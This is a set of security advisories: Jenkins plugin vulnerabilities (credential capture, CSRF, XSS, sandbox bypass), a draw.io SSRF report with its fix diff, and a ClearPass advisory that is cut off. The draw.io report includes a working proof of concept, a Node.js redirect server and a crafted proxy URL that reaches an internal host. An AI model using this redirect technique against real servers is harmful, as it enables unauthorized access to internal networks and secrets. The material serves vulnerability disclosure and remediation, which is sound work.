A missing permission check in Jenkins SSH Plugin 2.6.1 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified SSH server using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

This advisory announces vulnerabilities in the following Jenkins deliverables:

*   Application Detector Plugin
*   Autocomplete Parameter Plugin
*   Blue Ocean Plugin
*   Git Plugin
*   GitLab Plugin
*   Global Variable String Parameter Plugin
*   JDK Parameter Plugin
*   Mercurial Plugin
*   Multiselect parameter Plugin
*   Pipeline SCM API for Blue Ocean Plugin
*   Pipeline: Groovy Plugin
*   Promoted Builds (Simple) Plugin
*   Random String Parameter Plugin
*   REPO Plugin
*   Rundeck Plugin
*   Script Security Plugin
*   Selection tasks Plugin
*   SSH Plugin
*   Storable Configs Plugin
*   vboxwrapper Plugin
*   WMI Windows Agents Plugin

**Descriptions****Sandbox bypass vulnerability through implicitly allowlisted platform Groovy files in Pipeline: Groovy Plugin**

**SECURITY-359 / CVE-2022-30945**

Pipeline: Groovy Plugin allows pipelines to load Groovy source files. This is intended to be used to allow Global Shared Libraries to execute without sandbox protection.

In Pipeline: Groovy Plugin 2689.v434009a\_31b\_f1 and earlier, any Groovy source files bundled with Jenkins core and plugins could be loaded this way and their methods executed. If a suitable Groovy source file is available on the classpath of Jenkins, sandbox protections can be bypassed.

Note

The Jenkins security team has been unable to identify any Groovy source files in Jenkins core or plugins that would allow attackers to execute dangerous code. While the severity of this issue is declared as High due to the potential impact, successful exploitation is considered very unlikely.

Pipeline: Groovy Plugin 2692.v76b\_089ccd026 restricts which Groovy source files can be loaded in Pipelines.

Groovy source files in public plugins intended to be executed in sandboxed pipelines have been identified and added to an allowlist. The new extension point org.jenkinsci.plugins.workflow.cps.GroovySourceFileAllowlist allows plugins to add specific Groovy source files to that allowlist if necessary, but creation of plugin-specific Pipeline DSLs is strongly discouraged.

**CSRF vulnerability in Script Security Plugin**

**SECURITY-2116 / CVE-2022-30946**

Script Security Plugin 1158.v7c1b\_73a\_69a\_08 and earlier does not require POST requests for a form validation endpoint, resulting in a cross-site request forgery (CSRF) vulnerability.

This vulnerability allows attackers to have Jenkins send an HTTP request to an attacker-specified webserver.

This form validation method no longer sends HTTP requests in Script Security Plugin 1172.v35f6a\_0b\_8207e.

**Multiple SCM plugins can check out from the controller file system**

**SECURITY-2478 / CVE-2022-30947 (Git), CVE-2022-30948 (Mercurial), CVE-2022-30949 (REPO)**

SCMs support a number of different URL schemes, including local file system paths (e.g. using file: URLs).

Historically in Jenkins, only agents checked out from SCM, and if multiple projects share the same agent, there is no expected isolation between builds besides using different workspaces unless overridden. Some Pipeline-related features check out SCMs from the Jenkins controller as well.

This allows attackers able to configure pipelines to check out some SCM repositories stored on the Jenkins controller’s file system using local paths as SCM URLs, obtaining limited information about other projects' SCM contents. The following Jenkins plugins are known to be affected:

*   Git 4.11.1 and earlier
    
*   Mercurial 2.16 and earlier
    
*   REPO 1.14.0 and earlier
    

Affected plugins have been updated to reject local file paths being checked out on the controller:

*   Git 4.11.2
    
*   Mercurial 2.16.1
    
*   REPO 1.15.0
    

**Multiple vulnerabilities in Windows Remote Command library in WMI Windows Agents Plugin**

**SECURITY-2604 / CVE-2022-30950 (buffer overflow), CVE-2022-30951 (access control)**

WMI Windows Agents Plugin 1.8 and earlier includes the Windows Remote Command library. It provides a general-purpose remote command execution capability that Jenkins uses to check if Java is available, and if not, to install it.

This library has a buffer overflow vulnerability that may allow users able to connect to a named pipe to execute commands on the Windows agent machine.

Additionally, while the processes are started as the user who connects to the named pipe, no access control takes place, potentially allowing users to start processes even if they’re not allowed to log in.

WMI Windows Agents Plugin 1.8.1 no longer includes the Windows Remote Command library. A Java runtime is expected to be available on agent machines and WMI Windows Agents Plugin 1.8.1 does not install a JDK automatically otherwise.

Note

WMI Windows Agents Plugin is the only Jenkins project deliverable the Jenkins project security team is aware of that includes the Windows Remote Command library.

**User-scoped credentials exposed to other users by Pipeline SCM API for Blue Ocean Plugin**

**SECURITY-714 / CVE-2022-30952**

When pipelines are created using the pipeline creation wizard in Blue Ocean, the credentials used are stored in the per-user credentials store of the user creating the pipeline. To allow pipelines to use this credential to scan repositories and checkout from SCM, the Blue Ocean Credentials Provider allows pipelines to access a specific credential from the per-user credentials store in Pipeline SCM API for Blue Ocean Plugin 1.25.3 and earlier.

As a result, attackers with Job/Configure permission can rewrite job configurations in a way that lets them access and capture any attacker-specified credential from any user’s private credentials store.

Pipeline SCM API for Blue Ocean Plugin 1.25.4 deprecates the Blue Ocean Credentials Provider and disables it by default. As a result, all jobs initially set up using the Blue Ocean pipeline creation wizard and configured to use the credential specified at that time will no longer be able to access the credential, resulting in failures to scan repositories, checkout from SCM, etc. unless the repository is public and can be accessed without credentials.

Note

This also applies to newly created pipelines after Pipeline SCM API for Blue Ocean Plugin has been updated to 1.25.4.

Administrators should reconfigure affected pipelines to use a credential from the Jenkins credential store or a folder credential store. See this help page on cloudbees.com to learn more.

To re-enable the Blue Ocean Credentials Provider, set the Java system property io.jenkins.blueocean.rest.impl.pipeline.credential.BlueOceanCredentialsProvider.enabled to true. Doing so is discouraged, as that will restore the unsafe behavior.

Note

While Credentials Plugin provides the _Configure Credential Providers_ UI to enable or disable certain credentials providers, enabling the Blue Ocean Credentials Provider there is not enough in Pipeline SCM API for Blue Ocean Plugin 1.25.4. Both the UI and system property need to enable the Blue Ocean Credentials Provider.

Administrators not immediately able to update Blue Ocean are advised to disable the Blue Ocean Credentials Provider through the UI at _Manage Jenkins » Configure Credential Providers_ and to reconfigure affected pipelines to use a credential from the Jenkins credential store or a folder credential store.

**CSRF vulnerability and missing permission checks in Blue Ocean Plugin**

**SECURITY-2502 / CVE-2022-30953 (CSRF), CVE-2022-30954 (permission check)**

Blue Ocean Plugin 1.25.3 and earlier does not perform permission checks in several HTTP endpoints.

This allows attackers with Overall/Read permission to send requests to an attacker-specified URL.

Additionally, these endpoints do not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

Blue Ocean Plugin 1.25.4 requires POST requests and the appropriate permissions for the affected HTTP endpoints.

**Missing permission check in GitLab Plugin allows enumerating credentials IDs**

**SECURITY-2753 / CVE-2022-30955**

GitLab Plugin 1.5.31 and earlier does not perform a permission check in an HTTP endpoint.

This allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins. Those can be used as part of an attack to capture the credentials using another vulnerability.

An enumeration of credentials IDs in GitLab Plugin 1.5.32 requires the appropriate permissions.

**Stored XSS vulnerability in Rundeck Plugin**

**SECURITY-2600 / CVE-2022-30956**

Rundeck Plugin 3.6.10 and earlier does not restrict URL schemes in Rundeck webhook submissions.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to submit crafted Rundeck webhook payloads.

Rundeck Plugin 3.6.11 sanitizes URLs submitted in Rundeck webhook payloads.

**Missing permission check in SSH Plugin allows enumerating credentials IDs**

**SECURITY-2315 / CVE-2022-30957**

SSH Plugin 2.6.1 and earlier does not perform a permission check in an HTTP endpoint.

This allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins. Those can be used as part of an attack to capture the credentials using another vulnerability.

As of publication of this advisory, there is no fix.

**CSRF vulnerability and missing permission checks in SSH Plugin allow capturing credentials**

**SECURITY-2093 / CVE-2022-30958 (CSRF), CVE-2022-30959 (permission check)**

SSH Plugin 2.6.1 and earlier does not perform a permission check in an HTTP endpoint.

This allows attackers with Overall/Read permission to connect to an attacker-specified SSH server using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

Additionally, this endpoint does not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

As of publication of this advisory, there is no fix.

**Stored XSS vulnerabilities in multiple plugins providing additional parameter types**

**SECURITY-2717 / CVE-2022-30960 (Application Detector), CVE-2022-30961 (Autocomplete Parameter), CVE-2022-30962 (Global Variable String Parameter), CVE-2022-30963 (JDK Parameter), CVE-2022-30964 (Multiselect parameter), CVE-2022-30965 (Promoted Builds (Simple)), CVE-2022-30966 (Random String Parameter), CVE-2022-30967 (Selection tasks), CVE-2022-30968 (vboxwrapper)**

Multiple plugins do not escape the name and description of the parameter types they provide:

*   Application Detector Plugin 1.0.8 and earlier (SECURITY-2732 / CVE-2022-30960)
    
*   Autocomplete Parameter Plugin 1.1 and earlier (SECURITY-2729 / CVE-2022-30961)
    
*   Global Variable String Parameter Plugin 1.2 and earlier (SECURITY-2715 / CVE-2022-30962)
    
*   JDK Parameter Plugin 1.0 and earlier (SECURITY-2713 / CVE-2022-30963)
    
*   Multiselect parameter Plugin 1.3 and earlier (SECURITY-2726 / CVE-2022-30964)
    
*   Promoted Builds (Simple) Plugin 1.9 and earlier (SECURITY-2720 / CVE-2022-30965)
    
*   Random String Parameter Plugin 1.0 and earlier (SECURITY-2722 / CVE-2022-30966)
    
*   Selection tasks Plugin 1.0 and earlier (SECURITY-2728 / CVE-2022-30967)
    
*   vboxwrapper Plugin 1.3 and earlier (SECURITY-2734 / CVE-2022-30968)
    

This results in stored cross-site scripting (XSS) vulnerabilites exploitable by attackers with Item/Configure permission.

Exploitation of these vulnerabilities requires that parameters are listed on another page, like the "Build With Parameters" and "Parameters" pages provided by Jenkins (core), and that those pages are not hardened to prevent exploitation. Jenkins (core) has prevented exploitation of vulnerabilities of this kind on the "Build With Parameters" and "Parameters" pages since 2.44 and LTS 2.32.2 as part of the SECURITY-353 / CVE-2017-2601 fix. Additionally, several plugins have previously been updated to list parameters in a way that prevents exploitation by default, see SECURITY-2617 in the 2022-04-12 security advisory for a list.

The following plugins have been updated to escape the name and description of the parameter types they provide in the versions specified:

*   Application Detector Plugin 1.0.9
    
*   Multiselect parameter Plugin 1.4
    

As of publication of this advisory, there is no fix available for the following plugins:

*   Autocomplete Parameter Plugin 1.1 and earlier (SECURITY-2729 / CVE-2022-30961)
    
*   Global Variable String Parameter Plugin 1.2 and earlier (SECURITY-2715 / CVE-2022-30962)
    
*   JDK Parameter Plugin 1.0 and earlier (SECURITY-2713 / CVE-2022-30963)
    
*   Promoted Builds (Simple) Plugin 1.9 and earlier (SECURITY-2720 / CVE-2022-30965)
    
*   Random String Parameter Plugin 1.0 and earlier (SECURITY-2722 / CVE-2022-30966)
    
*   Selection tasks Plugin 1.0 and earlier (SECURITY-2728 / CVE-2022-30967)
    
*   vboxwrapper Plugin 1.3 and earlier (SECURITY-2734 / CVE-2022-30968)
    

**CSRF vulnerability in Autocomplete Parameter Plugin results in RCE**

**SECURITY-2322 / CVE-2022-30969**

Autocomplete Parameter Plugin 1.1 and earlier does not require POST requests for a form validation endpoint executing a provided Groovy script, resulting in a cross-site request forgery (CSRF) vulnerability.

This vulnerability allows attackers to execute arbitrary code without sandbox protection if the victim is an administrator.

As of publication of this advisory, there is no fix.

**Stored XSS vulnerability in Autocomplete Parameter Plugin**

**SECURITY-2267 / CVE-2022-30970**

Autocomplete Parameter Plugin 1.1 and earlier references Dropdown Autocomplete parameter and Auto Complete String parameter names in an unsafe manner from Javascript embedded in view definitions.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.

Note

While this looks similar to SECURITY-2729, this is an independent problem and exploitable even on views rendering parameters that otherwise attempt to prevent XSS vulnerabilities in parameter names.

As of publication of this advisory, there is no fix.

**XXE vulnerability in Storable Configs Plugin**

**SECURITY-1969 / CVE-2022-30971 (XXE), CVE-2022-30972 (CSRF)**

Storable Configs Plugin 1.0 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

This allows attackers with Item/Configure permission to have Jenkins parse a crafted file that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.

Additionally, the HTTP endpoint calling the XML parser does not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

As of publication of this advisory, there is no fix.

**Severity**

*   SECURITY-359: High
*   SECURITY-714: Medium
*   SECURITY-1969: High
*   SECURITY-2093: High
*   SECURITY-2116: Medium
*   SECURITY-2267: High
*   SECURITY-2315: Medium
*   SECURITY-2322: High
*   SECURITY-2478: Low
*   SECURITY-2502: Medium
*   SECURITY-2600: High
*   SECURITY-2604: Medium
*   SECURITY-2717: High
*   SECURITY-2753: Medium

**Affected Versions**

*   **Application Detector Plugin** up to and including 1.0.8
*   **Autocomplete Parameter Plugin** up to and including 1.1
*   **Blue Ocean Plugin** up to and including 1.25.3
*   **Git Plugin** up to and including 4.11.1
*   **GitLab Plugin** up to and including 1.5.31
*   **Global Variable String Parameter Plugin** up to and including 1.2
*   **JDK Parameter Plugin** up to and including 1.0
*   **Mercurial Plugin** up to and including 2.16
*   **Multiselect parameter Plugin** up to and including 1.3
*   **Pipeline SCM API for Blue Ocean Plugin** up to and including 1.25.3
*   **Pipeline: Groovy Plugin** up to and including 2689.v434009a\_31b\_f1
*   **Promoted Builds (Simple) Plugin** up to and including 1.9
*   **Random String Parameter Plugin** up to and including 1.0
*   **REPO Plugin** up to and including 1.14.0
*   **Rundeck Plugin** up to and including 3.6.10
*   **Script Security Plugin** up to and including 1158.v7c1b\_73a\_69a\_08
*   **Selection tasks Plugin** up to and including 1.0
*   **SSH Plugin** up to and including 2.6.1
*   **Storable Configs Plugin** up to and including 1.0
*   **vboxwrapper Plugin** up to and including 1.3
*   **WMI Windows Agents Plugin** up to and including 1.8

**Fix**

*   **Application Detector Plugin** should be updated to version 1.0.9
*   **Blue Ocean Plugin** should be updated to version 1.25.4
*   **Git Plugin** should be updated to version 4.11.2
*   **GitLab Plugin** should be updated to version 1.5.32
*   **Mercurial Plugin** should be updated to version 2.16.1
*   **Multiselect parameter Plugin** should be updated to version 1.4
*   **Pipeline SCM API for Blue Ocean Plugin** should be updated to version 1.25.4
*   **Pipeline: Groovy Plugin** should be updated to version 2692.v76b\_089ccd026
*   **REPO Plugin** should be updated to version 1.14.1
*   **Rundeck Plugin** should be updated to version 3.6.11
*   **Script Security Plugin** should be updated to version 1172.v35f6a\_0b\_8207e
*   **WMI Windows Agents Plugin** should be updated to version 1.8.1

These versions include fixes to the vulnerabilities described above. All prior versions are considered to be affected by these vulnerabilities unless otherwise indicated.

As of publication of this advisory, no fixes are available for the following plugins:

*   Autocomplete Parameter Plugin
*   Global Variable String Parameter Plugin
*   JDK Parameter Plugin
*   Promoted Builds (Simple) Plugin
*   Random String Parameter Plugin
*   Selection tasks Plugin
*   SSH Plugin
*   Storable Configs Plugin
*   vboxwrapper Plugin

**Credit**

The Jenkins project would like to thank the reporters for discovering and reporting these vulnerabilities:

*   **Daniel Beck, CloudBees, Inc.** for SECURITY-1969, SECURITY-2478
*   **Jesse Glick, CloudBees, Inc.** for SECURITY-359
*   **Kalle Niemitalo, Procomp Solutions Oy** for SECURITY-2604
*   **Kevin Guerroudj** for SECURITY-2267
*   **Kevin Guerroudj, CloudBees, Inc.** for SECURITY-2600, SECURITY-2753
*   **Kevin Guerroudj, CloudBees, Inc., Wadeck Follonier, CloudBees, Inc., and Daniel Beck, CloudBees, Inc.** for SECURITY-2717
*   **Kevin Guerroudj, Justin Philip, Marc Heyries, Wadeck Follonier, CloudBees, Inc.** for SECURITY-2322
*   **Long Nguyen, Viettel Cyber Security** for SECURITY-2093
*   **Tanner Emek from Tinder Security Labs** for SECURITY-2502
*   **Wadeck Follonier, CloudBees, Inc.** for SECURITY-2315

CVE-2022-30959: Jenkins Security Advisory 2022-05-17

Server-Side Request Forgery (SSRF) in GitHub repository jgraph/drawio prior to 18.0.5.

**Description**

Through the ProxyServlet external content can be retrieved. This can be done by providing a URL in the url query parameter. There are a few restrictions in place, especially internal hosts are forbidden. The validation of the url parameter looks as follows:

https://github.com/jgraph/drawio/blob/v18.0.3/src/main/java/com/mxgraph/online/ProxyServlet.java#L233-L282

        public boolean checkUrlParameter(String url)
        {
            if (url != null)
            {
                try
                {
                    URL parsedUrl = new URL(url);
                    String protocol = parsedUrl.getProtocol();
                    String host = parsedUrl.getHost().toLowerCase();
    
                    return (protocol.equals("http") || protocol.equals("https"))
                            && !host.endsWith(".internal")
                            && !host.endsWith(".local")
                            && !host.contains("localhost")
                            && !host.startsWith("0.") // 0.0.0.0/8
                            && !host.startsWith("10.") // 10.0.0.0/8
                            && !host.startsWith("127.") // 127.0.0.0/8
                            && !host.startsWith("169.254.") // 169.254.0.0/16
                            && !host.startsWith("172.16.") // 172.16.0.0/12
                            && !host.startsWith("172.17.") // 172.16.0.0/12
                            && !host.startsWith("172.18.") // 172.16.0.0/12
                            && !host.startsWith("172.19.") // 172.16.0.0/12
                            && !host.startsWith("172.20.") // 172.16.0.0/12
                            && !host.startsWith("172.21.") // 172.16.0.0/12
                            && !host.startsWith("172.22.") // 172.16.0.0/12
                            && !host.startsWith("172.23.") // 172.16.0.0/12
                            && !host.startsWith("172.24.") // 172.16.0.0/12
                            && !host.startsWith("172.25.") // 172.16.0.0/12
                            && !host.startsWith("172.26.") // 172.16.0.0/12
                            && !host.startsWith("172.27.") // 172.16.0.0/12
                            && !host.startsWith("172.28.") // 172.16.0.0/12
                            && !host.startsWith("172.29.") // 172.16.0.0/12
                            && !host.startsWith("172.30.") // 172.16.0.0/12
                            && !host.startsWith("172.31.") // 172.16.0.0/12
                            && !host.startsWith("192.0.0.") // 192.0.0.0/24
                            && !host.startsWith("192.168.") // 192.168.0.0/16
                            && !host.startsWith("198.18.") // 198.18.0.0/15
                            && !host.startsWith("198.19.") // 198.18.0.0/15
                            && !host.endsWith(".arpa"); // reverse domain (needed?)
                }
                catch (MalformedURLException e)
                {
                    return false;
                }
            }
            else
            {
                return false;
            }
        }
    

All of the restrictions of the URL validation function can be bypassed. The cause for this can be found in the doGet method. The URL validation check is performed only on the initial url parameter in the GET request.

https://github.com/jgraph/drawio/blob/v18.0.3/src/main/java/com/mxgraph/online/ProxyServlet.java#L65-L71

        protected void doGet(HttpServletRequest request,
                HttpServletResponse response) throws ServletException, IOException
        {
            String urlParam = request.getParameter("url");
    
            if (checkUrlParameter(urlParam))
            {
    

After the initial request, potential redirects are followed. However, there are no checks against the value of the Location header, which will be used for the URLConnection on subsequent requests.

https://github.com/jgraph/drawio/blob/v18.0.3/src/main/java/com/mxgraph/online/ProxyServlet.java#L113-L143

                        // Follows a maximum of 6 redirects 
                        while (counter++ <= 6
                                && (status == HttpURLConnection.HTTP_MOVED_PERM
                                        || status == HttpURLConnection.HTTP_MOVED_TEMP))
                        {
                            url = new URL(connection.getHeaderField("Location"));
                            connection = url.openConnection();
                            ((HttpURLConnection) connection)
                                    .setInstanceFollowRedirects(true);
                            connection.setConnectTimeout(TIMEOUT);
                            connection.setReadTimeout(TIMEOUT);
    
                            // Workaround for 451 response from Iconfinder CDN
                            connection.setRequestProperty("User-Agent", "draw.io");
                            status = ((HttpURLConnection) connection)
                                    .getResponseCode();
                        }
    
                        if (status >= 200 && status <= 299)
                        {
                            response.setStatus(status);
                            
                            // Copies input stream to output stream
                            InputStream is = connection.getInputStream();
                            byte[] head = (contentAlwaysAllowed(urlParam)) ? emptyBytes
                                    : Utils.checkStreamContent(is);
                            response.setContentType("application/octet-stream");
                            String base64 = request.getParameter("base64");
                            copyResponse(is, out, head,
                                    base64 != null && base64.equals("1"));
                        }
    

This allows sending HTTP requests to arbitrary internal and external hosts/URLs and bypassing the restrictions of the validation function.

**Proof of Concept**

For the proof of concept we have three servers, one attacker controlled server, the server where the draw.io webapp is located, and an internal server that contains a secret.

**Attacker server:**  
This server serves the purpose of redirecting to URLs of the attackers choice. For example the following script, saved as server.js can be run with Node.js (node server.js):

    const http = require('http');
    
    const requestListener = function (req, res) {
      res.writeHead(301, {
          "Location": "http://127.0.0.1:9001/"
      });
      res.end();
    }
    
    const server = http.createServer(requestListener);
    server.listen(9000);
    

For this PoC this server runs under hax.7085.at:9000.

**draw.io web app**  
The draw.io webapp is located under draw.7085.at:8080/draw.

**Internal server**  
The internal server is located under 127.0.0.1:9001.

    const http = require('http');
    
    const requestListener = function (req, res) {
      res.writeHead(200, {
        "Content-Type": "text/html"
      });
      res.end("<html>internal secret</html>");
    }
    
    const server = http.createServer(requestListener);
    server.listen(9001);
    

After everything is set up, then a request to the ProxyServlet of the draw.io web app can be sent by providing the URL to the attackers server in the url parameter in the following format: <url-to-webapp-host>/proxy?url=http://hax.7085.at:9000/. So the URL in this case would be http://draw.7085.at:8080/draw/proxy?url=http://hax.7085.at:9000/.

Sending a request to this URL will bypass the restrictions and reveal the secret of the internal server.

**Impact**

It allows sending HTTP requests to arbitrary hosts, bypassing the URL restrictions and accessing otherwise forbidden internal hosts, reading the full response.

CVE-2022-1711: SSRF via Unvalidated Redirects in ProxyServlet in drawio

Server-Side Request Forgery (SSRF) in GitHub repository jgraph/drawio prior to 18.0.6.

@@ -11,11 +11,9 @@ import java.io.InputStream; import java.io.OutputStream; import java.net.HttpURLConnection; import java.net.MalformedURLException; import java.net.URL; import java.net.URLConnection; import java.net.UnknownHostException; import java.net.InetAddress; import java.util.logging.Level; import java.util.logging.Logger;  
@@ -68,7 +66,7 @@ protected void doGet(HttpServletRequest request, { String urlParam = request.getParameter("url");  
if (checkUrlParameter(urlParam)) if (Utils.sanitizeUrl(urlParam)) { // build the UML source from the compressed request parameter String ref = request.getHeader("referer"); @@ -118,7 +116,7 @@ protected void doGet(HttpServletRequest request, { String redirectUrl = connection.getHeaderField("Location");  
if (!checkUrlParameter(redirectUrl)) if (!Utils.sanitizeUrl(redirectUrl)) { break; } @@ -235,72 +233,6 @@ protected void copyResponse(InputStream is, OutputStream out, byte\[\] head, } }  
/\*\* \* Checks if the URL parameter is legal. \*/ public boolean checkUrlParameter(String url) { if (url != null) { try { URL parsedUrl = new URL(url); String protocol = parsedUrl.getProtocol(); String host = parsedUrl.getHost(); InetAddress address = InetAddress.getByName(host); String hostAddress = address.getHostAddress(); host = host.toLowerCase();  
return (protocol.equals("http") || protocol.equals("https")) && !address.isAnyLocalAddress() && !address.isLoopbackAddress() && !address.isLinkLocalAddress() && !host.endsWith(".internal") // Redundant && !host.endsWith(".local") // Redundant && !host.contains("localhost") // Redundant && !hostAddress.startsWith("0.") // 0.0.0.0/8 && !hostAddress.startsWith("10.") // 10.0.0.0/8 && !hostAddress.startsWith("127.") // 127.0.0.0/8 && !hostAddress.startsWith("169.254.") // 169.254.0.0/16 && !hostAddress.startsWith("172.16.") // 172.16.0.0/12 && !hostAddress.startsWith("172.17.") // 172.16.0.0/12 && !hostAddress.startsWith("172.18.") // 172.16.0.0/12 && !hostAddress.startsWith("172.19.") // 172.16.0.0/12 && !hostAddress.startsWith("172.20.") // 172.16.0.0/12 && !hostAddress.startsWith("172.21.") // 172.16.0.0/12 && !hostAddress.startsWith("172.22.") // 172.16.0.0/12 && !hostAddress.startsWith("172.23.") // 172.16.0.0/12 && !hostAddress.startsWith("172.24.") // 172.16.0.0/12 && !hostAddress.startsWith("172.25.") // 172.16.0.0/12 && !hostAddress.startsWith("172.26.") // 172.16.0.0/12 && !hostAddress.startsWith("172.27.") // 172.16.0.0/12 && !hostAddress.startsWith("172.28.") // 172.16.0.0/12 && !hostAddress.startsWith("172.29.") // 172.16.0.0/12 && !hostAddress.startsWith("172.30.") // 172.16.0.0/12 && !hostAddress.startsWith("172.31.") // 172.16.0.0/12 && !hostAddress.startsWith("192.0.0.") // 192.0.0.0/24 && !hostAddress.startsWith("192.168.") // 192.168.0.0/16 && !hostAddress.startsWith("198.18.") // 198.18.0.0/15 && !hostAddress.startsWith("198.19.") // 198.18.0.0/15 && !hostAddress.startsWith("fc00::") // fc00::/7 https://stackoverflow.com/questions/53764109/is-there-a-java-api-that-will-identify-the-ipv6-address-fd00-as-local-private && !hostAddress.startsWith("fd00::") // fd00::/8 && !host.endsWith(".arpa"); // reverse domain (needed?) } catch (MalformedURLException e) { return false; } catch (UnknownHostException e) { return false; } } else { return false; } }  
/\*\* \* Returns true if the content check should be omitted. \*/

CVE-2022-1723: 18.0.6 release · jgraph/drawio@7a68ebe

A authenticated remote command injection vulnerability was discovered in Aruba ClearPass Policy Manager version(s): 6.10.4 and below, 6.9.9 and below, 6.8.9-HF2 and below, 6.7.x and below. Aruba has released updates to ClearPass Policy Manager that address this security vulnerability.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Aruba Product Security Advisory =============================== Advisory ID: ARUBA-PSA-2022-007 CVE: CVE-2021-21419, CVE-2021-33503, CVE-2022-23657, CVE-2022-23658, CVE-2022-23659, CVE-2022-23660, CVE-2022-23661, CVE-2022-23662, CVE-2022-23663, CVE-2022-23664, CVE-2022-23665, CVE-2022-23666, CVE-2022-23667, CVE-2022-23668, CVE-2022-23669, CVE-2022-23670, CVE-2022-23671, CVE-2022-23672, CVE-2022-23673, CVE-2022-23674, CVE-2022-23675 Publication Date: 2022-May-04 Status: Confirmed Severity: Critical Revision: 1 Title ===== ClearPass Policy Manager Multiple Vulnerabilities Overview ======== Aruba has released updates to ClearPass Policy Manager that address multiple security vulnerabilities. Affected Products ================= These vulnerabilities affect ClearPass Policy Manager running the following patch versions unless specifically noted otherwise in the details section: - ClearPass Policy Manager 6.10.x: 6.10.4 and below - ClearPass Policy Manager 6.9.x: 6.9.9 and below - ClearPass Policy Manager 6.8.x: 6.8.9-HF2 and below Updating ClearPass Policy Manager to a patch version listed in the Resolution section at the end of this advisory will resolve all issues in the details section. Versions of ClearPass Policy Manager that are end of life should be considered to be affected by these vulnerabilities unless otherwise indicated. Impacted customers should plan to migrate to a supported version. Versions that should be considered to be vulnerable and not addressed by this advisory include: - ClearPass Policy Manager 6.7.x and below Details ======= Authentication Bypass Leading to Remote Code Execution in ClearPass Policy Manager Web-Based Management Interface (CVE-2022-23657, CVE-2022-23658, CVE-2022-23660) --------------------------------------------------------------------- Vulnerabilities in the web-based management interface of ClearPass Policy Manager could allow an unauthenticated remote attacker to run arbitrary commands on the underlying host. Successful exploitation of these vulnerabilities allow an attacker to execute arbitrary commands as root on the underlying operating system leading to complete system compromise. Internal References: ATLCP-156, ATLCP-162, ATLCP-163 Severity: Critical CVSSv3.x Overall Score: 9.8 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Discovery: These vulnerabilities were discovered and reported by Daniel Jensen (@dozernz) via Aruba's Bug Bounty Program. Authenticated Information Disclosure in ClearPass Policy Manager Web-Based Management Interface (CVE-2022-23670) --------------------------------------------------------------------- A vulnerability in the web-based management interface of ClearPass Policy Manager could allow a remote attacker authenticated with low privileges to access sensitive information. A successful exploit allows an attacker to retrieve information which could be used to potentially gain further access to network services supported by ClearPass Policy Manager. Internal Reference: ATLCP-169 Severity: High CVSSv3.x Overall Score: 8.5 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N Discovery: This vulnerability was discovered and reported by Colton Bachman of Aruba Threat Labs. Sensitive Information Disclosure in ClearPass Policy Manager Cluster via Privileged Network Position (CVE-2022-23671) --------------------------------------------------------------------- A vulnerability exists in the ClearPass Policy Manager cluster communications that allow for an attacker in a privileged network position to potentially obtain sensitive information. A successful exploit could allow an attacker to retrieve information that allows for unauthorized actions as a privileged user on the ClearPass Policy Manager cluster. Internal Reference: ATLCP-182 Severity: High CVSSv3.x Overall Score: 7.5 CVSS Vector: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H Discovery: This vulnerability was discovered and reported by the Central College Security Team. Authenticated Stored Cross-Site Scripting Vulnerability (XSS) in ClearPass Policy Manager Web-Based Management Interface (CVE-2022-23674, CVE-2022-23675) --------------------------------------------------------------------- Multiple vulnerabilities in the web-based management interface of ClearPass Policy Manager could allow an authenticated remote attacker to conduct a stored cross-site scripting (XSS) attack against an administrative user of the interface. A successful exploit allows an attacker to execute arbitrary script code in a victim’s browser in the context of the affected interface. Internal References: ATLCP-176, ATLCP-185 Severity: High CVSSv3.x Overall Score: 7.5 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L Discovery: These vulnerabilities were discovered and reported by Rahul Mohan of Aruba Networks and Daniel Jensen (@dozernz) via Aruba's Bug Bounty Program. Authenticated Remote Command Injection in ClearPass Policy Manager Command Line Interface Leading to Full System Compromise (CVE-2022-23661, CVE-2022-23662) --------------------------------------------------------------------- Vulnerabilities in the ClearPass Policy Manager command line interface allow remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as root on the underlying operating system leading to complete system compromise. Internal References: ATLCP-77, ATLCP-107 Severity: High CVSSv3.x Overall Score: 7.2 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H Discovery: These vulnerabilities were discovered and reported by Erik De Jong (bugcrowd.com/erikdejong) via Aruba's Bug Bounty Program. Authenticated Remote Command Injection in ClearPass Policy Manager Web-Based Management Interface Leading to Full System Compromise (CVE-2022-23663, CVE-2022-23664, CVE-2021-23665, CVE-2022-23666, CVE-2022-23672, CVE-2022-23673) --------------------------------------------------------------------- Vulnerabilities in the ClearPass Policy Manager web-based management interface allow remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as root on the underlying operating system leading to complete system compromise. Internal References: ATLCP-140, ATLCP-141, ATLCP-157, ATLCP-160, ATLCP-161, ATLCP-172 Severity: High CVSSv3.x Overall Score: 7.2 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H Discovery: These vulnerabilities were discovered and reported by Daniel Jensen (@dozernz) via Aruba's Bug Bounty Program. Reflected Cross Site Scripting Vulnerability (XSS) in ClearPass Policy Manager Web-Based Management Interface (CVE-2022-23659) --------------------------------------------------------------------- A vulnerability within the web-based management interface of ClearPass Policy Manager could allow a remote attacker to conduct a reflected cross-site scripting (XSS) attack against a user of the interface. A successful exploit could allow an attacker to execute arbitrary 